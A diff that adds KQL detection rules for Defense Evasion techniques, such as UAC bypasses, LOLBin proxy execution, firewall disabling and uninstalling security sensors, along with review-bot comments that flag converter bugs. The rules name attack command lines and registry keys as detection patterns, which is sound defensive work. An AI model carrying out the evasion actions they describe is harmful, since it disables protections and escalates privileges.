+// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql
new file mode 100644
index 00000000..65b1bdbd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via Sdclt
+// Author: Omer Yampel, Christian Burkard (Nextron Systems)
+// Date: 2017-03-17
+// Level: high
+// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceRegistryEvents
+| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql
new file mode 100644
index 00000000..dac64381
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via Windows Firewall Snap-In Hijack
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql
new file mode 100644
index 00000000..bb229670
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Via Wsreset
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-07
+// Level: high
+// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql
new file mode 100644
index 00000000..c2371ce2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass WSReset
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql
new file mode 100644
index 00000000..94f1016a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql
@@ -0,0 +1,12 @@
+// Title: Ufw Force Stop Using Ufw-Init
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-18
+// Level: medium
+// Description: Detects attempts to force stop the ufw using ufw-init
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Network administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-ufw-init" and ProcessCommandLine contains "force-stop") or (ProcessCommandLine contains "ufw" and ProcessCommandLine contains "disable")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
new file mode 100644
index 00000000..b03e4751
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon AddinUtil.EXE CommandLine Execution
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
new file mode 100644
index 00000000..7b568e30
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
+// Author: Mateusz Wydra, oscd.community
+// Date: 2020-10-12
+// Level: medium
+// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate, non-default assistive technology applications execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
new file mode 100644
index 00000000..e48f2624
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon Child Process Of AddinUtil.EXE
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
new file mode 100644
index 00000000..74008bae
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
@@ -0,0 +1,14 @@
+// Title: Uncommon Child Process Of Appvlp.EXE
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: Detects uncommon child processes of Appvlp.EXE
+Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
+Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
+or to mark a file as a system file.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql
new file mode 100644
index 00000000..b5a04ba0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Child Process Of Defaultpack.EXE
+// Author: frack113
+// Date: 2022-12-31
+// Level: medium
+// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
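Review bot: The description continuation lines `+Appvlp or the Application Virtualization Utility ...`, `+Normally, this binary ...` and `+or to mark a file as a system file.` are written without the `//` prefix, so the generated .kql file contains bare prose above the query and will not parse as KQL. Every wrapped line of a multi-line Sigma description needs the same `// ` prefix as the first one, e.g. `// Appvlp or the Application Virtualization Utility is included with Microsoft Office. ...`. The same pattern appears in the Setres.EXE, Keyboard Layout IME, Mysql daemon and Link.EXE hunks, so the fix belongs in the converter that emits the header (split the description on newlines and prefix each line) rather than in the individual files.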
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
new file mode 100644
index 00000000..6d60358e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
@@ -0,0 +1,15 @@
+// Title: Uncommon Child Process Of Setres.EXE
+// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-11
+// Level: high
+// Description: Detects uncommon child process of Setres.EXE.
+Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.
+It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1202
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath contains "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe") and (not((FolderPath endswith "C:\\Windows\\System32\\choice.exe" or FolderPath endswith "C:\\Windows\\SysWOW64\\choice.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql
new file mode 100644
index 00000000..2299a635
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Child Process Spawned By Odbcconf.EXE
+// Author: Harjot Singh @cyb3rjy0t
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process
+// - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\odbcconf.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
new file mode 100644
index 00000000..c7f78337
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
@@ -0,0 +1,15 @@
+// Title: Uncommon Extension In Keyboard Layout IME File Registry Value
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-21
+// Level: high
+// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
new file mode 100644
index 00000000..00504d88
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
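Review bot: `RegistryKey endswith "\\Control\\Keyboard Layouts*"` carries the Sigma wildcard through as a literal asterisk, and KQL `endswith` does no globbing, so the predicate only matches a key that literally ends in `Layouts*` and the rule never fires. The intent is any key beneath the Keyboard Layouts tree, which in KQL is `RegistryKey contains "\\Control\\Keyboard Layouts\\"`. A trailing `*` inside an `endswith` string looks like a converter gap rather than a one-off, so the other generated rules are worth grepping for a literal `*` inside `endswith`/`startswith` operands.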
@@ -0,0 +1,12 @@
+// Title: Uncommon File Creation By Mysql Daemon Process
+// Author: Joseph Kamau
+// Date: 2024-05-27
+// Level: high
+// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
+Which could be an indicator of "User Defined Functions" abuse to download malware.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
new file mode 100644
index 00000000..1a9de40f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon FileSystem Load Attempt By Format.com
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
new file mode 100644
index 00000000..5e376ce7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
@@ -0,0 +1,15 @@
+// Title: Uncommon Link.EXE Parent Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: medium
+// Description: Detects an uncommon parent process of "LINK.EXE".
+Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
+Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
+This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
+By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not(((InitiatingProcessFolderPath contains "\\VC\\bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
new file mode 100644
index 00000000..7bc7d4f3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Outbound Kerberos Connection
+// Author: Ilyas Ochkov, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003
+// False Positives:
+// - Web Browsers and third party application might generate similar activity. An initial baseline is required.
+
+DeviceNetworkEvents
+| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
new file mode 100644
index 00000000..e5245706
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon Sigverif.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sigverif.exe" and (not((FolderPath in~ ("C:\\Windows\\System32\\WerFault.exe", "C:\\Windows\\SysWOW64\\WerFault.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql
new file mode 100644
index 00000000..5148e8ca
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Svchost Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-08-15
+// Level: medium
+// Description: Detects an uncommon svchost parent process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql
new file mode 100644
index 00000000..7bd9719b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql
@@ -0,0 +1,12 @@
+// Title: Uninstall Crowdstrike Falcon Sensor
+// Author: frack113
+// Date: 2021-07-12
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql
new file mode 100644
index 00000000..5dea738a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql
@@ -0,0 +1,12 @@
+// Title: Uninstall Sysinternals Sysmon
+// Author: frack113
+// Date: 2022-01-12
+// Level: high
+// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrators might use this command to remove Sysmon for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql
new file mode 100644
index 00000000..59fa3860
--- /dev/null
+++ b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Unmount Share Via Net.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2020-10-08
+// Level: low
+// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+// False Positives:
+// - Administrators or Power users may remove their shares via cmd line
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql
new file mode 100644
index 00000000..ad0992df
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql
@@ -0,0 +1,10 @@
+// Title: Use Icacls to Hide File to Everyone
+// Author: frack113
+// Date: 2022-07-18
+// Level: medium
+// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql
new file mode 100644
index 00000000..5b5c1d72
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql
@@ -0,0 +1,12 @@
+// Title: Use NTFS Short Name in Command Line
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql
new file mode 100644
index 00000000..f6793daf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql
@@ -0,0 +1,12 @@
+// Title: Use NTFS Short Name in Image
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-06
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Software Installers
+
+DeviceProcessEvents
